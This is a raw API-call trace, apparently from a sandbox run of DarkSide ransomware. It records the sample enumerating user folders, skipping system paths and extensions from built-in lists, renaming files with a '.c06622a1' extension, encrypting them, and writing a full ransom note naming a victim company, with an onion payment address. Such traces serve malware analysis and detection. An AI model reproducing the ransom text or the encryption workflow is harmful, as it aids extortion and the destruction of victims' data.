1 [0158.039] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0158.039] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z4Usx4v.docx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z4Usx4v.docx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z4Usx4v.docx" [0158.039] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z4Usx4v.docx") returned 0x38 [0158.039] wcscpy (in: _Dest=0x32200c0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.039] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z4Usx4v.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z4usx4v.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z4Usx4v.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z4usx4v.docx.c06622a1"), dwFlags=0x8) returned 1 [0158.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Z4Usx4v.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z4usx4v.docx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x198 [0158.042] CreateIoCompletionPort (FileHandle=0x198, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0158.042] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x36c0020 [0158.049] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1a591242 [0158.049] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x209ac356 [0158.049] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x29fff992 [0158.049] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1af38897 [0158.049] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x644511b2 [0158.049] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x22c2c15f [0158.049] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1e27a2fc [0158.049] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x220207ab [0158.052] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x36c0094, Length=0x80) returned 0xd63cc7b7 [0158.052] RtlComputeCrc32 (PartialCrc=0xc7b7, Buffer=0x36c0094, Length=0x80) returned 0x1008b040 [0158.052] RtlComputeCrc32 (PartialCrc=0xb040, Buffer=0x36c0094, Length=0x80) returned 0x266c9d50 [0158.052] RtlComputeCrc32 (PartialCrc=0x9d50, Buffer=0x36c0094, Length=0x80) returned 0x3a86167a [0158.052] RtlComputeCrc32 (PartialCrc=0x167a, Buffer=0x36c0094, Length=0x80) returned 0xeea9f84 [0158.052] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x36c0020) returned 1 [0158.052] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0158.053] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0158.054] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5442e1f0, ftCreationTime.dwHighDateTime=0x1d5e64c, ftLastAccessTime.dwLowDateTime=0x33c9a4b0, ftLastAccessTime.dwHighDateTime=0x1d5e4c9, ftLastWriteTime.dwLowDateTime=0x33c9a4b0, ftLastWriteTime.dwHighDateTime=0x1d5e4c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_6F2UOdqzk-Uc", cAlternateFileName="_6F2UO~1")) returned 1 [0158.055] _wcsicmp (_Str1="$recycle.bin", _Str2="_6F2UOdqzk-Uc") returned -59 [0158.055] wcslen (_String="$recycle.bin") returned 0xc [0158.055] _wcsicmp (_Str1="config.msi", _Str2="_6F2UOdqzk-Uc") returned 4 [0158.055] wcslen (_String="config.msi") returned 0xa [0158.055] _wcsicmp (_Str1="$windows.~bt", _Str2="_6F2UOdqzk-Uc") returned -59 [0158.055] wcslen (_String="$windows.~bt") returned 0xc [0158.055] _wcsicmp (_Str1="$windows.~ws", _Str2="_6F2UOdqzk-Uc") returned -59 [0158.055] wcslen (_String="$windows.~ws") returned 0xc [0158.055] _wcsicmp (_Str1="windows", _Str2="_6F2UOdqzk-Uc") returned 24 [0158.055] wcslen (_String="windows") returned 0x7 [0158.055] _wcsicmp (_Str1="appdata", _Str2="_6F2UOdqzk-Uc") returned 2 [0158.055] wcslen (_String="appdata") returned 0x7 [0158.055] _wcsicmp (_Str1="application data", _Str2="_6F2UOdqzk-Uc") returned 2 [0158.055] wcslen (_String="application data") returned 0x10 [0158.055] _wcsicmp (_Str1="boot", _Str2="_6F2UOdqzk-Uc") returned 3 [0158.055] wcslen (_String="boot") returned 0x4 [0158.055] _wcsicmp (_Str1="google", _Str2="_6F2UOdqzk-Uc") returned 8 [0158.055] wcslen (_String="google") returned 0x6 [0158.055] _wcsicmp (_Str1="mozilla", _Str2="_6F2UOdqzk-Uc") returned 14 [0158.055] wcslen (_String="mozilla") returned 0x7 [0158.055] _wcsicmp (_Str1="program files", _Str2="_6F2UOdqzk-Uc") returned 17 [0158.055] wcslen (_String="program files") returned 0xd [0158.055] _wcsicmp (_Str1="program files (x86)", _Str2="_6F2UOdqzk-Uc") returned 17 [0158.055] wcslen (_String="program files (x86)") returned 0x13 [0158.055] _wcsicmp (_Str1="programdata", _Str2="_6F2UOdqzk-Uc") returned 17 [0158.055] wcslen (_String="programdata") returned 0xb [0158.055] _wcsicmp (_Str1="system volume information", _Str2="_6F2UOdqzk-Uc") returned 20 [0158.055] wcslen (_String="system volume information") returned 0x19 [0158.055] _wcsicmp (_Str1="tor browser", _Str2="_6F2UOdqzk-Uc") returned 21 [0158.055] wcslen (_String="tor browser") returned 0xb [0158.055] _wcsicmp (_Str1="windows.old", _Str2="_6F2UOdqzk-Uc") returned 24 [0158.055] wcslen (_String="windows.old") returned 0xb [0158.055] _wcsicmp (_Str1="intel", _Str2="_6F2UOdqzk-Uc") returned 10 [0158.055] wcslen (_String="intel") returned 0x5 [0158.056] _wcsicmp (_Str1="msocache", _Str2="_6F2UOdqzk-Uc") returned 14 [0158.056] wcslen (_String="msocache") returned 0x8 [0158.056] _wcsicmp (_Str1="perflogs", _Str2="_6F2UOdqzk-Uc") returned 17 [0158.056] wcslen (_String="perflogs") returned 0x8 [0158.056] _wcsicmp (_Str1="x64dbg", _Str2="_6F2UOdqzk-Uc") returned 25 [0158.056] wcslen (_String="x64dbg") returned 0x6 [0158.056] _wcsicmp (_Str1="public", _Str2="_6F2UOdqzk-Uc") returned 17 [0158.056] wcslen (_String="public") returned 0x6 [0158.056] _wcsicmp (_Str1="all users", _Str2="_6F2UOdqzk-Uc") returned 2 [0158.056] wcslen (_String="all users") returned 0x9 [0158.056] _wcsicmp (_Str1="default", _Str2="_6F2UOdqzk-Uc") returned 5 [0158.056] wcslen (_String="default") returned 0x7 [0158.056] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*" [0158.056] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned 0x2d [0158.056] wcscpy (in: _Dest=0x208e78, _Source="_6F2UOdqzk-Uc" | out: _Dest="_6F2UOdqzk-Uc") returned="_6F2UOdqzk-Uc" [0158.056] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0158.056] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0158.057] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" [0158.057] GetNamedSecurityInfoW () returned 0x0 [0158.057] SetEntriesInAclW () returned 0x0 [0158.057] SetNamedSecurityInfoW () returned 0x0 [0158.074] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22aee8) returned 1 [0158.074] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0158.074] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc")) returned 1 [0158.074] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0158.074] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0158.074] WriteFile (in: hFile=0x1a4, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e8bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e8bc*=0x7ca, lpOverlapped=0x0) returned 1 [0158.075] CloseHandle (hObject=0x1a4) returned 1 [0158.076] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0158.076] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc")) returned 0x10 [0158.076] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\") returned="" [0158.076] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\") returned 0x3a [0158.076] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\*", fInfoLevelId=0x0, lpFindFileData=0x32eb1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb1c) returned 0x154188 [0158.076] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5442e1f0, ftCreationTime.dwHighDateTime=0x1d5e64c, ftLastAccessTime.dwLowDateTime=0x8beb6fc0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8beb6fc0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.077] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe995060, ftCreationTime.dwHighDateTime=0x1d5e4e5, ftLastAccessTime.dwLowDateTime=0xfb6589b0, ftLastAccessTime.dwHighDateTime=0x1d5de3b, ftLastWriteTime.dwLowDateTime=0xfb6589b0, ftLastWriteTime.dwHighDateTime=0x1d5de3b, nFileSizeHigh=0x0, nFileSizeLow=0xaf94, dwReserved0=0x0, dwReserved1=0x0, cFileName="7hXcpypld6Q.rtf", cAlternateFileName="7HXCPY~1.RTF")) returned 1 [0158.077] _wcsicmp (_Str1="7hXcpypld6Q.rtf", _Str2="README.c06622a1.TXT") returned -59 [0158.077] wcsstr (_Str="7hXcpypld6Q.rtf", _SubStr="README") returned 0x0 [0158.077] _wcsicmp (_Str1="autorun.inf", _Str2="7hXcpypld6Q.rtf") returned 42 [0158.077] wcslen (_String="autorun.inf") returned 0xb [0158.077] _wcsicmp (_Str1="boot.ini", _Str2="7hXcpypld6Q.rtf") returned 43 [0158.077] wcslen (_String="boot.ini") returned 0x8 [0158.077] _wcsicmp (_Str1="bootfont.bin", _Str2="7hXcpypld6Q.rtf") returned 43 [0158.077] wcslen (_String="bootfont.bin") returned 0xc [0158.077] _wcsicmp (_Str1="bootsect.bak", _Str2="7hXcpypld6Q.rtf") returned 43 [0158.077] wcslen (_String="bootsect.bak") returned 0xc [0158.077] _wcsicmp (_Str1="desktop.ini", _Str2="7hXcpypld6Q.rtf") returned 45 [0158.077] wcslen (_String="desktop.ini") returned 0xb [0158.077] _wcsicmp (_Str1="iconcache.db", _Str2="7hXcpypld6Q.rtf") returned 50 [0158.077] wcslen (_String="iconcache.db") returned 0xc [0158.077] _wcsicmp (_Str1="ntldr", _Str2="7hXcpypld6Q.rtf") returned 55 [0158.077] wcslen (_String="ntldr") returned 0x5 [0158.077] _wcsicmp (_Str1="ntuser.dat", _Str2="7hXcpypld6Q.rtf") returned 55 [0158.077] wcslen (_String="ntuser.dat") returned 0xa [0158.077] _wcsicmp (_Str1="ntuser.dat.log", _Str2="7hXcpypld6Q.rtf") returned 55 [0158.078] wcslen (_String="ntuser.dat.log") returned 0xe [0158.078] _wcsicmp (_Str1="ntuser.ini", _Str2="7hXcpypld6Q.rtf") returned 55 [0158.078] wcslen (_String="ntuser.ini") returned 0xa [0158.078] _wcsicmp (_Str1="thumbs.db", _Str2="7hXcpypld6Q.rtf") returned 61 [0158.078] wcslen (_String="thumbs.db") returned 0x9 [0158.078] _wcsicmp (_Str1="386", _Str2="rtf") returned -63 [0158.078] wcslen (_String="386") returned 0x3 [0158.078] _wcsicmp (_Str1="adv", _Str2="rtf") returned -17 [0158.078] wcslen (_String="adv") returned 0x3 [0158.078] _wcsicmp (_Str1="ani", _Str2="rtf") returned -17 [0158.078] wcslen (_String="ani") returned 0x3 [0158.078] _wcsicmp (_Str1="bat", _Str2="rtf") returned -16 [0158.078] wcslen (_String="bat") returned 0x3 [0158.078] _wcsicmp (_Str1="bin", _Str2="rtf") returned -16 [0158.078] wcslen (_String="bin") returned 0x3 [0158.078] _wcsicmp (_Str1="cab", _Str2="rtf") returned -15 [0158.078] wcslen (_String="cab") returned 0x3 [0158.078] _wcsicmp (_Str1="cmd", _Str2="rtf") returned -15 [0158.078] wcslen (_String="cmd") returned 0x3 [0158.078] _wcsicmp (_Str1="com", _Str2="rtf") returned -15 [0158.078] wcslen (_String="com") returned 0x3 [0158.079] _wcsicmp (_Str1="cpl", _Str2="rtf") returned -15 [0158.079] wcslen (_String="cpl") returned 0x3 [0158.079] _wcsicmp (_Str1="cur", _Str2="rtf") returned -15 [0158.079] wcslen (_String="cur") returned 0x3 [0158.079] _wcsicmp (_Str1="deskthemepack", _Str2="rtf") returned -14 [0158.079] wcslen (_String="deskthemepack") returned 0xd [0158.079] _wcsicmp (_Str1="diagcab", _Str2="rtf") returned -14 [0158.079] wcslen (_String="diagcab") returned 0x7 [0158.079] _wcsicmp (_Str1="diagcfg", _Str2="rtf") returned -14 [0158.079] wcslen (_String="diagcfg") returned 0x7 [0158.079] _wcsicmp (_Str1="diagpkg", _Str2="rtf") returned -14 [0158.079] wcslen (_String="diagpkg") returned 0x7 [0158.079] _wcsicmp (_Str1="dll", _Str2="rtf") returned -14 [0158.079] wcslen (_String="dll") returned 0x3 [0158.079] _wcsicmp (_Str1="drv", _Str2="rtf") returned -14 [0158.079] wcslen (_String="drv") returned 0x3 [0158.079] _wcsicmp (_Str1="exe", _Str2="rtf") returned -13 [0158.079] wcslen (_String="exe") returned 0x3 [0158.079] _wcsicmp (_Str1="hlp", _Str2="rtf") returned -10 [0158.079] wcslen (_String="hlp") returned 0x3 [0158.079] _wcsicmp (_Str1="icl", _Str2="rtf") returned -9 [0158.079] wcslen (_String="icl") returned 0x3 [0158.079] _wcsicmp (_Str1="icns", _Str2="rtf") returned -9 [0158.079] wcslen (_String="icns") returned 0x4 [0158.079] _wcsicmp (_Str1="ico", _Str2="rtf") returned -9 [0158.079] wcslen (_String="ico") returned 0x3 [0158.079] _wcsicmp (_Str1="ics", _Str2="rtf") returned -9 [0158.079] wcslen (_String="ics") returned 0x3 [0158.080] _wcsicmp (_Str1="idx", _Str2="rtf") returned -9 [0158.080] wcslen (_String="idx") returned 0x3 [0158.080] _wcsicmp (_Str1="ldf", _Str2="rtf") returned -6 [0158.080] wcslen (_String="ldf") returned 0x3 [0158.080] _wcsicmp (_Str1="lnk", _Str2="rtf") returned -6 [0158.080] wcslen (_String="lnk") returned 0x3 [0158.080] _wcsicmp (_Str1="mod", _Str2="rtf") returned -5 [0158.080] wcslen (_String="mod") returned 0x3 [0158.080] _wcsicmp (_Str1="mpa", _Str2="rtf") returned -5 [0158.080] wcslen (_String="mpa") returned 0x3 [0158.080] _wcsicmp (_Str1="msc", _Str2="rtf") returned -5 [0158.080] wcslen (_String="msc") returned 0x3 [0158.080] _wcsicmp (_Str1="msp", _Str2="rtf") returned -5 [0158.080] wcslen (_String="msp") returned 0x3 [0158.080] _wcsicmp (_Str1="msstyles", _Str2="rtf") returned -5 [0158.080] wcslen (_String="msstyles") returned 0x8 [0158.080] _wcsicmp (_Str1="msu", _Str2="rtf") returned -5 [0158.080] wcslen (_String="msu") returned 0x3 [0158.080] _wcsicmp (_Str1="nls", _Str2="rtf") returned -4 [0158.080] wcslen (_String="nls") returned 0x3 [0158.080] _wcsicmp (_Str1="nomedia", _Str2="rtf") returned -4 [0158.080] wcslen (_String="nomedia") returned 0x7 [0158.080] _wcsicmp (_Str1="ocx", _Str2="rtf") returned -3 [0158.080] wcslen (_String="ocx") returned 0x3 [0158.080] _wcsicmp (_Str1="prf", _Str2="rtf") returned -2 [0158.080] wcslen (_String="prf") returned 0x3 [0158.080] _wcsicmp (_Str1="ps1", _Str2="rtf") returned -2 [0158.080] wcslen (_String="ps1") returned 0x3 [0158.080] _wcsicmp (_Str1="rom", _Str2="rtf") returned -5 [0158.080] wcslen (_String="rom") returned 0x3 [0158.080] _wcsicmp (_Str1="rtp", _Str2="rtf") returned 10 [0158.080] wcslen (_String="rtp") returned 0x3 [0158.080] _wcsicmp (_Str1="scr", _Str2="rtf") returned 1 [0158.080] wcslen (_String="scr") returned 0x3 [0158.080] _wcsicmp (_Str1="shs", _Str2="rtf") returned 1 [0158.081] wcslen (_String="shs") returned 0x3 [0158.081] _wcsicmp (_Str1="spl", _Str2="rtf") returned 1 [0158.081] wcslen (_String="spl") returned 0x3 [0158.081] _wcsicmp (_Str1="sys", _Str2="rtf") returned 1 [0158.081] wcslen (_String="sys") returned 0x3 [0158.081] _wcsicmp (_Str1="theme", _Str2="rtf") returned 2 [0158.081] wcslen (_String="theme") returned 0x5 [0158.081] _wcsicmp (_Str1="themepack", _Str2="rtf") returned 2 [0158.081] wcslen (_String="themepack") returned 0x9 [0158.081] _wcsicmp (_Str1="wpx", _Str2="rtf") returned 5 [0158.081] wcslen (_String="wpx") returned 0x3 [0158.081] _wcsicmp (_Str1="lock", _Str2="rtf") returned -6 [0158.081] wcslen (_String="lock") returned 0x4 [0158.081] _wcsicmp (_Str1="key", _Str2="rtf") returned -7 [0158.081] wcslen (_String="key") returned 0x3 [0158.081] _wcsicmp (_Str1="hta", _Str2="rtf") returned -10 [0158.081] wcslen (_String="hta") returned 0x3 [0158.081] _wcsicmp (_Str1="msi", _Str2="rtf") returned -5 [0158.081] wcslen (_String="msi") returned 0x3 [0158.081] _wcsicmp (_Str1="pdb", _Str2="rtf") returned -2 [0158.081] wcslen (_String="pdb") returned 0x3 [0158.081] _wcsicmp (_Str1="sqlite", _Str2="rtf") returned 1 [0158.081] wcslen (_String="sqlite") returned 0x6 [0158.081] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc")) returned 0x10 [0158.081] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0158.081] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc" [0158.081] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc") returned 0x39 [0158.081] wcscpy (in: _Dest=0x32400d4, _Source="7hXcpypld6Q.rtf" | out: _Dest="7hXcpypld6Q.rtf") returned="7hXcpypld6Q.rtf" [0158.081] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\7hXcpypld6Q.rtf", dwFileAttributes=0x80) returned 1 [0158.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\7hXcpypld6Q.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\7hxcpypld6q.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0158.082] SetFilePointerEx (in: hFile=0x1c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.082] ReadFile (in: hFile=0x1c, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0158.083] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x75299a75 [0158.083] RtlComputeCrc32 (PartialCrc=0x9a75, Buffer=0x32e9a4, Length=0x80) returned 0xf2ead572 [0158.083] RtlComputeCrc32 (PartialCrc=0xd572, Buffer=0x32e9a4, Length=0x80) returned 0x1e081757 [0158.083] RtlComputeCrc32 (PartialCrc=0x1757, Buffer=0x32e9a4, Length=0x80) returned 0xe33403ad [0158.083] RtlComputeCrc32 (PartialCrc=0x3ad, Buffer=0x32e9a4, Length=0x80) returned 0xa8cd4218 [0158.083] CloseHandle (hObject=0x1c) returned 1 [0158.083] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0158.083] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\7hXcpypld6Q.rtf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\7hXcpypld6Q.rtf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\7hXcpypld6Q.rtf" [0158.083] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\7hXcpypld6Q.rtf") returned 0x49 [0158.083] wcscpy (in: _Dest=0x32500fa, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.119] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\7hXcpypld6Q.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\7hxcpypld6q.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\7hXcpypld6Q.rtf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\7hxcpypld6q.rtf.c06622a1"), dwFlags=0x8) returned 1 [0158.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\7hXcpypld6Q.rtf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\7hxcpypld6q.rtf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x198 [0158.123] CreateIoCompletionPort (FileHandle=0x198, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0158.123] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0158.130] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x615e32ca [0158.131] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x41e017bc [0158.131] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3f19f722 [0158.131] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x71ad20e7 [0158.131] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xb60129c [0158.131] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2560681b [0158.131] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7ba2e9a0 [0158.131] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x32481427 [0158.134] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0xea350f80 [0158.134] RtlComputeCrc32 